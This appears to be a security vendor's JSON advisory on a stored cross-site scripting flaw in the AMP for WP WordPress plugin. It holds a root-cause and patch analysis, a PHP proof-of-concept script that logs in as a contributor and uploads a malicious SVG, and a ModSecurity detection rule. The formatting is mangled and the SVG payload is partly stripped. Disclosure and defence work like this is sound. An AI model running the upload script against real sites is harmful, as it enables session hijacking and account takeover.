“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-0627:nThe AMP for WordPress plugin, versions 1.1.10 and earlier, contains an authenticated stored cross-site scripting vulnerability. The vulnerability resides in the plugin’s SVG file upload sanitization function. Attackers with Contributor-level access or higher can upload malicious SVG files containing JavaScript payloads that execute when the file is viewed. The CVSS score of 6.4 reflects the authentication requirement and potential impact on site integrity.nnThe root cause is insufficient sanitization in the ampforwp_sanitize_svg_file function within accelerated-mobile-pages/templates/features.php. The vulnerable version only removes tags using a simple regex pattern (line 10373: preg_replace(‘/]*>(.*?)/is’, ”, $svg_content)). This approach fails to address other XSS vectors including event handler attributes (onload, onerror, onmouseover), foreignObject elements, and SVG animation attributes. The function ampforwp_sanitize_svg_upload (lines 10340-10354) triggers this sanitization only based on MIME type detection, without comprehensive content validation.nnExploitation requires an authenticated attacker with at least Contributor privileges to upload an SVG file through WordPress media upload interfaces. The attacker crafts an SVG containing XSS payloads using event handlers like onload=”alert(document.cookie)” within SVG elements, foreignObject elements containing HTML/JavaScript, or SVG animation attributes with embedded scripts. When any user views the uploaded SVG file directly or when it’s embedded in a page, the malicious JavaScript executes in the victim’s browser context.nnThe patch in version 1.1.11 completely rewrites the sanitization logic. It replaces the single regex pattern with a multi-layered approach using DOMDocument when available (lines 10389-196). The new ampforwp_sanitize_svg_file function now removes script tags, foreignObject elements, and event handler attributes via XPath queries. A fallback function ampforwp_sanitize_svg_fallback provides regex-based sanitization when DOMDocument is unavailable. The patch also adds MIME type and file extension validation, introduces a filter hook for controlled bypass, and extends sanitization to existing files during updates via the wp_handle_upload filter.nnSuccessful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the malicious SVG. This can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. Since the payload is stored in the WordPress media library, it persists across sessions and affects all users who access the file, making this a persistent threat vector.”,
poc_php”: “// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-0627 – AMP for WP <= 1.1.10 – Authenticated (Contributor+) Stored Cross-Site Scripting via SVG File Uploadn<?phpnn$target_url = 'http://vulnerable-wordpress-site.com';n$username = 'contributor_user';n$password = 'contributor_password';nn// Malicious SVG with multiple XSS vectorsn$svg_payload = 'nn n n n alert(‘XSS via foreignObject’)n n n n’;nn// Create temporary file for uploadn$tmp_file = tempnam(sys_get_temp_dir(), ‘xss_’);nfile_put_contents($tmp_file, $svg_payload);nn// Initialize cURL session for loginn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-login.php’);ncurl_setopt($ch, CURLOPT_POST, 1);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([n ‘log’ => $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => ‘1’n]));ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookies.txt’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookies.txt’);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);n$response = curl_exec($ch);nn// Check if login succeeded by looking for dashboard elementsnif (strpos($response, ‘wp-admin-bar’) === false) {n echo “Login failed. Check credentials.\n”;n exit;n}nnecho “Logged in successfully.\n”;nn// Get nonce for media upload (from AJAX endpoint)ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/admin-ajax.php’);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([n ‘action’ => ‘wp-ajax-upload-attachment’n]));n$ajax_response = curl_exec($ch);nn// Extract nonce from page (simplified – real implementation would parse HTML)n// For demonstration, we’ll use a placeholdern$upload_nonce = ‘media_upload_nonce_placeholder’;nn// Prepare file uploadn$post_data = [n ‘name’ => ‘xss.svg’,n ‘action’ => ‘upload-attachment’,n ‘_wpnonce’ => $upload_nonce,n ‘async-upload’ => new CURLFile($tmp_file, ‘image/svg+xml’, ‘xss.svg’)n];nncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/async-upload.php’);ncurl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);n$upload_response = curl_exec($ch);nn// Check upload successnif (strpos($upload_response, ‘success’) !== false || strpos($upload_response, ‘url’) !== false) {n echo “SVG file uploaded successfully.\n”;n echo “Payload will execute when users view the uploaded SVG file.\n”;n n // Extract file URL from response (simplified)n preg_match(‘/”url”:”([^”]+)”/’, $upload_response, $matches);n if (!empty($matches[1])) {n $svg_url = stripslashes($matches[1]);n echo “SVG accessible at: ” . $svg_url . “\n”;n echo “Visit this URL to trigger the XSS payload.\n”;n }n} else {n echo “Upload failed. Response: ” . substr($upload_response, 0, 200) . “…\n”;n}nn// Cleanupncurl_close($ch);nunlink($tmp_file);nn?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2026-0627nSecRule REQUEST_URI “@streq /wp-admin/async-upload.php” \n “id:1000627,phase:2,deny,status:403,chain,msg:’CVE-2026-0627: AMP for WP SVG XSS upload attempt’,severity:’CRITICAL’,tag:’CVE-2026-0627′,tag:’WordPress’,tag:’AMP-for-WP’,tag:’XSS'”n SecRule FILES “@rx \.svg$” “chain”n SecRule FILES_TMP_CONTENT “@rx (?i)(on[a-z]+\s*=|foreignObject|]*>|]*onbegin)” \n “t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E””
}
“`